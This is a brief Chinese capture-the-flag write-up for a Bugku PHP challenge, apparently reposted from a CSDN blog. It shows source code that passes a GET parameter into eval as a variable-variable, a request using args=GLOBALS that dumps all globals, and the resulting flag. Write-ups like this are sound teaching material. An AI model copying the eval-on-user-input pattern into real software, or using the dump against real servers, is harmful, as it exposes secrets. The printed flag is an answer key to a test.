bugku ctf 变量1

打开

进行分析 (大佬分析)

flag In the variable ! <?php  


error_reporting(0);// 关闭php错误显示
include "flag1.php";// 引入flag1.php文件代码
highlight_file(__file__);
if(isset($_GET['args'])){// 通过get方式传递 args变量才能执行if里面的代码
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){// 这个正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成
        die("args error!");
    }
    eval("var_dump($$args);");// 这边告诉我们这题是代码审计的题目
}
?>

所以我们就测试php的全局变量,将其变量名传入,经测试,传入GLOBALS,可以得到flag值

http://120.24.86.145:8004/index1.php?args=GLOBALS

对这个进行访问 即可

出现flag

flag{92853051ab894a64f7865cf3c2128b34}

提交即可

猜你喜欢

转载自blog.csdn.net/qq_42777804/article/details/81624876
今日推荐